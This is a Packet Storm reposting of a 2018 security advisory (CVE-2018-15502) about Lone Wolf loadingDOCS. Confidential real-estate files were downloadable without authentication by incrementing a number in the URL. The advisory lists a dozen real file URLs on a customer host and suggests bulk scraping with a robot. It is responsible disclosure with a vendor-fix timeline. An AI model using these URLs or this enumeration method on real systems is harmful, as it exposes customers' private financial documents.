exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Lone Wolf loadingDOCS Insecure Permissions

Lone Wolf loadingDOCS Insecure Permissions
Posted Sep 15, 2018
Authored by Ian Lord

Lone Wolf loadingDOCS allows remote attackers the ability to download confidential files via simply incrementing a value.

tags | exploit, remote
advisories | CVE-2018-15502
SHA-256 | ae4561b7efd1a5dde70e1a56f1367df34592eb9afc3cc8de6556b812e5e7f989

Lone Wolf loadingDOCS Insecure Permissions

Change Mirror Download
#############################################################
#
# EZMAX SECURITY ADVISORY
# https://www.ezmax.ca/
#
#############################################################
#
# Product: Loading Docs
# Vendor: Lone Wolf Technologies (http://www.lwolf.com)
# CVE ID: CVE-2018-15502
# NVD Link: https://nvd.nist.gov/vuln/detail/CVE-2018-15502
# Subject: Insecure permissions allow remote attackers to download any confidential files via https requests for predictable URLs.
# Risk: High
# Effect: Remotely exploitable
# Author: Ian Lord (ian.lord@ezmax.ca)
# Date: 2018-08-13
#
#############################################################


Introduction:
-------------
Loading Docs is an electronic document management used in real estate brokerages to store confidential customer's files related to real estate transactions.


Affected:
---------
Loading docs: Tested 2018-08-13

Technical Description:
----------------------

All the files in loading docs are publicly accessible without any protection whatsoever.

Here are example of the files that can be accessed without any security validation:
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042919
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042917
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042916
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042915
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042912
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042910
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042939
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042938
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042937
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042934
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042933
https://br1408-connect.globalwolfweb.com/GetFile.aspx?fsg=90916c11-c41b-704042931

Just randomly changing the number at the end gives access to multiple files from apparently multiple customers.

So anyone using a robot could download thousands of files containing sensitive information. (Brokerage contracts, trust account details, Fintrac details, etc).

We don't even need to be logged in the software as these URLS are public facing without any session or user validation.

Timeline:
---------
2018-08-03: Discovery by Ian Lord, e-Z-max Solutions (https://www.ezmax.ca/)
2018-08-13: Request for CVE number
2018-08-17: Assigned CVE-2018-15502
2018-08-17: Initial vendor notification
2018-08-29: Second vendor notification
2018-09-05: Initial vendor response
2018-09-06: Vendor confirms that the vulnerability has been addressed
2018-09-10: Public disclosure date



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close